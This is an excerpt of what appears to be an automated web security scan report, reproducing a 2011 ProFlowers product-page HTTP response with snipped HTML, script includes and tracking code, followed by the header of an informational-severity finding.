Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:50 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:08:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:51 GMT
Content-Length: 144498


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</title>
<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_productdetail.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom_pfc.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
       <meta id="_metaDescription" name="Description" content="Send flowers and gifts including Deluxe Mother...s Day Bouquet from ProFlowers.com. Flowers and gifts are available for any holiday or occas
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="innerContainer">
           <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a id="productDetailBody_ctl09__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="productDetailBody_ctl09_ctl91__repeater_ctl00__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Today</a>
...[SNIP]...
<a href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
Body_ctl09_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div class="ProductInfoImage">
                           <img id="productDetailBody_productImage" class="productimagedimension" border="0" prvdid="productImage" RenderDivWhenInvisible="true" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=300&amp;hei=350" style="height:350px;width:300px;border-width:0px;" />
                       </div>
...[SNIP]...
<div id="productDetailBody_FlynnMagazeeny_divPicture" class="magPicture"> <img id="productDetailBody_FlynnMagazeeny_imgPicture" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/NTR_PD_Body_PFC_FLN_50_67_ReadersDigest_TB.gif" style="border-width:0px;" /> </div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shUpgradesHeader_image" class="Step_1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shMainAccessorySelectionHeader_image" class="Step_2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00__productImage" prvdid="productimage" class="selectedImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl03_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl03_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl03_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td id="productDetailBody_accMainAccSelection_noAccHeight" align="center" style="height:88px;background-color:#FFFFFF;"><img id="productDetailBody_accMainAccSelection__pcImage2" prvdid="infoimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//images/noVase.gif" style="height:48px;width:47px;border-width:0px;" /></td>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shZipCodeHeader_image" class="Step_4" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shDeliveryDateSelectionHeader_image" class="Step_3" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl00__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Today</a>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl01__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Sunday</a>
...[SNIP]...
<td align="left" valign="top" style="width:28px;"><img id="productDetailBody_deliveryCalendar_Image1" class="calendar_button" prvdid="calendar_button" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/icon_Calendar_DeliveryTime.gif" src="" style="border-width:0px;margin-left:5px; cursor:pointer;" /></td>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl00__pcHyperLink" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Today</a>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl01__pcHyperLink" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30050137" target="_blank">Sunday</a>
...[SNIP]...
<div class="AccessoryImages">
       <img id="productDetailBody_accPreview_Repeater1_ctl00_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />
<img id="productDetailBody_accPreview_Repeater1_ctl01_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />

   </div>
...[SNIP]...
" vspace="3" href="http://products.proflowers.com/flowers/Deluxe-Hugs-and-Kisses-5519?trackingpgroup=YMA&amp;tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Hugs and Kisses" style="border-width:0px;" /></a>
...[SNIP]...
space="3" href="http://products.proflowers.com/flowers/Mardi-Gras-Orchid-Garden-42864?trackingpgroup=YMA&amp;tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Mardi Gras Orchid Garden" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"><img id="productDetailBody_PCImage1" class="Ribbon25Mil" text="25 Million Orders Shipped" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
"text" value="Enter Your Email Here" id="productDetailBody_footer_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
</div><img class="shopOurBrandFamily" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" style="height:20px;width:181px;border-width:0px;" /> <br />
...[SNIP]...
itle="The freshest flowers, guaranteed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home décor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home décor." style="border-width:0px;" /></a>
...[SNIP]...
itle="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." style="border-width:0px;" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a> <a title="Unique personalized gifts for life's special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life's special occasions." 
style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_carousel&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</span>


       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

16.18. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

